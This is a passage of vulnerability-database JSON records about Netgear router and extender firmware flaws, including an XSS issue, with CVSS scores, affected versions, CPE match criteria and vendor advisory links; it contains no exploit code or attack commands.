"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.5,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-24T15:15:12.957",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000055104/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0117"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000055104/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0117"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-22 15:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by XSS. This affects D3600 before 1.0.0.67, D6000 before 1.0.0.67, D6100 before 1.0.0.56, D6200 before 1.1.00.24, D6220 before 1.0.0.32, D6400 before 1.0.0.66, D7000 before 1.0.1.52, D7000v2 before 1.0.0.44, D7800 before 1.0.1.30, D8500 before 1.0.3.35, DGN2200v4 before 1.0.0.96, DGN2200Bv4 before 1.0.0.96, EX2700 before 1.0.1.28, EX6100v2 before 1.0.1.54, EX6150v2 before 1.0.1.54, EX6200v2 before 1.0.1.52, EX6400 before 1.0.1.72, EX7300 before 1.0.1.72, EX8000 before 1.0.0.102, JNR1010v2 before 1.1.0.44, JWNR2010v5 before 1.1.0.44, PR2000 before 1.0.0.20, R6020 before 1.0.0.26, R6080 before 1.0.0.26, R6100 before 1.0.1.20, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.0.1.32, R6400v2 before 1.0.2.46, R6700 before 1.0.1.36, R6800 before 1.2.0.12, R6900v2 before 1.2.0.12, R6700v2 before 1.2.0.12, R6900 before 1.0.1.34, R6900P before 1.3.0.8, R7000 before 1.0.9.18, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.58, R7500 before 1.0.0.118, R7500v2 before 1.0.3.24, R7800 before 1.0.2.40, R7900 before 1.0.2.4, R7900P before 1.1.5.14, R8000 before 1.0.4.4, R8000P before 1.1.5.14, R8500 before 1.0.2.110, R8300 before 1.0.2.110, R9000 before 1.0.2.52, WN2000RPTv3 before 1.0.1.8, WN3000RPv3 before 1.0.2.50, WN3100RPv2 before 1.0.0.42, WNDR3400v3 before 1.0.1.16, WNDR3700v4 before 1.0.2.94, WNDR4300 before 1.0.2.96, WNDR4300v2 before 1.0.0.50, WNDR4500v3 before 1.0.0.50, WNR1000v4 before 1.1.0.44, WNR2000v5 before 1.0.0.62, WNR2020 before 1.1.0.44, WNR2050 before 1.1.0.44, and WNR3500Lv2 before 1.2.0.46.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d3600_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "47FB5F9D-2B33-44AD-BD57-164DF945ADA7",
"versionEndExcluding": "1.0.0.67",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d3600:-:*:*:*:*:*:*:*",
"matchCriteriaId": "31DE9D4E-3CDC-4552-A63F-DD5D95E23F63",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2089DF5E-598C-4CC2-B910-05C8D209A1BB",
"versionEndExcluding": "1.0.0.67",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6F6EA344-FF99-4F27-9860-3C5BE07345A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1B5A756C-6CA4-46EF-80B8-9051FB607B43",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7EFD1E86-F100-4E46-935D-903EB6FEFE9D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BA902AA9-525D-46BD-B586-1A0DC40EE391",
"versionEndExcluding": "1.1.00.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "00E6A1B7-4732-4259-9B71-10FF0B56A16B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1FD6552E-5BF6-4E57-90A7-39C4543B469C",
"versionEndExcluding": "1.0.0.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CE087F75-4C99-425C-A9B7-B261E5545297",
"versionEndExcluding": "1.0.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "327F762B-1F65-4DE0-B05C-1AAC64974A14",
"versionEndExcluding": "1.0.1.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AF04B65B-9685-4595-9C71-0F77AD7109BE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "34A8EAED-389E-4B14-949E-ED87A09F4D91",
"versionEndExcluding": "1.0.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0173E81F-5BE3-4249-A620-EC36AD109D75",
"versionEndExcluding": "1.0.1.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DA2D4987-3726-4A72-8D32-592F59FAC46D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9398174B-A4A6-449A-AB91-A93D3D9398DD",
"versionEndExcluding": "1.0.3.35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0ABDCFC2-E9EC-40F4-862F-B86FDD0A6AC7",
"versionEndExcluding": "1.0.0.96",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0D989DB4-5276-4BCF-A15E-BC207E03B2C7",
"versionEndExcluding": "1.0.0.96",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "25090794-A90C-40CD-8E95-87EC4E98B928",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex2700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A7D6C145-E2CD-4030-8AA8-C4071C0E242B",
"versionEndExcluding": "1.0.1.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex2700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5341B659-DE7D-43F1-954D-82049CBE18AD",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9EFE54D2-78A3-4461-BA5E-6807911C5684",
"versionEndExcluding": "1.0.1.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6100:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "88DD070C-7CBD-48A5-8D77-7C3D1C502D65",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F476F7D7-EAE2-4A09-8C4B-A53F885A1337",
"versionEndExcluding": "1.0.1.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "49846803-C6FB-4DD3-ADA7-78B9923536F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BCBD76F6-4E46-42E1-A6B6-373F2F7DB4AF",
"versionEndExcluding": "1.0.1.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "B4F62287-CB55-4FB1-AA39-62018654BA39",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "85392ECB-985F-43B2-89BE-755E433FC14B",
"versionEndExcluding": "1.0.1.72",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1289BBB4-1955-46A4-B5FE-BF11153C24F5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B0D1F6E4-A21F-4B86-B903-C26BB062D0DD",
"versionEndExcluding": "1.0.1.72",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F285D60D-A5DA-4467-8F79-15EF8135D007",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BBA04A7E-6029-498B-970E-0317BE0CF0F2",
"versionEndExcluding": "1.0.0.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8D9781C9-799A-4BDA-A027-987627A01633",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jnr1010_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FC9E7939-E195-44AB-8880-D0BCF26BF2E0",
"versionEndExcluding": "1.1.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jnr1010:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "CCE79B3F-8667-43C9-962D-EE089428F144",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jwnr2010_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "34429B2B-D8CB-4BEC-B5FA-5C7F8AC9A1FE",
"versionEndExcluding": "1.1.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jwnr2010:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "7399E5E9-40D8-4ECD-8B7B-C96A27E10282",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:pr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CDFB6345-0D0D-4586-9899-2438AADDCD3F",
"versionEndExcluding": "1.0.0.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:pr2000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2451CC0C-71B2-474D-93F0-2B2ACD802FE3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6020_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DF013048-DE20-49A5-9091-DD0DEA830D33",
"versionEndExcluding": "1.0.0.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6020:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5DDA7ABF-4C4B-4945-993A-F93BD8FCB55E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6080_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D70F5F17-5134-47AB-B182-321B1B0CD72B",
"versionEndExcluding": "1.0.0.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6080:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1CEB5C49-53CF-44AE-9A7D-E7E6201BFE62",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "76B12C31-83C3-427F-B2CA-D75EA89DCC6F",
"versionEndExcluding": "1.0.1.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F44A123-B256-428B-98C2-17570F2F32DC",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F5E7A8CA-134F-49B4-95D6-79A88CD6BB80",
"versionEndExcluding": "1.0.4.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "55058831-92FF-4A87-8340-E25AC0DDF89E",
"versionEndExcluding": "1.0.4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "97DE1C91-59A0-4902-B5C7-0CFD2631CAEE",
"versionEndExcluding": "1.0.1.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DBDE97EB-05FE-475E-8A4E-13C97E91548A",
"versionEndExcluding": "1.0.2.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "442F153C-737B-44D4-9A6D-EB6F6C47B986",
"versionEndExcluding": "1.0.1.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "36949C1B-4E77-447C-A206-B4E8385FA6C5",
"versionEndExcluding": "1.2.0.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "09404083-B00B-4C1F-8085-BC242E625CA3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5B7CDA8C-3ED3-46B2-AC4F-330251B7F454",
"versionEndExcluding": "1.2.0.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "2E8EB69B-6619-47B6-A073-D0B840D4EB0B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4096E4AD-F3DA-4D1D-BD48-E39235669A68",
"versionEndExcluding": "1.2.0.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "9F9706E6-CA53-43E4-91B0-D52655C86860",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "81F70E0C-3674-4981-B815-0721F6C6E588",
"versionEndExcluding": "1.0.1.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "326BBECA-9A76-4A3E-90F7-023797D5D186",
"versionEndExcluding": "1.3.0.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "03DC2062-58D1-40D6-8536-A13C87F2CF11",
"versionEndExcluding": "1.0.9.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09963BE1-D57D-491A-9BD8-A1A46ED993E0",
"versionEndExcluding": "1.3.0.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2FB08FA1-A476-4E05-9904-9BE30C9E77B7",
"versionEndExcluding": "1.0.0.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B75230D7-5B50-47C2-B5C5-C60C6974C305",
"versionEndExcluding": "1.0.0.58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7494430D-BA3F-4EDB-9FB8-7586D4457B9D",
"versionEndExcluding": "1.0.0.118",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "EF3B3F26-401C-4ED0-B871-4B4F8521F369",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C38F66ED-C53D-40F4-9F1E-96254BCD8A0C",
"versionEndExcluding": "1.0.3.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7500:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "2E0DFBF4-E393-44AE-AEF9-1B2059EE5AE8",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A2E62164-2324-4AF2-B300-8005DAD433B6",
"versionEndExcluding": "1.0.2.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "17CF7445-6950-45FE-9D1A-E23F63316329",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BCE1150D-8464-4421-94BD-EE81977BAC34",
"versionEndExcluding": "1.0.2.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "606460FB-B46F-4490-96FC-B226F3A2C55D",
"versionEndExcluding": "1.1.5.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
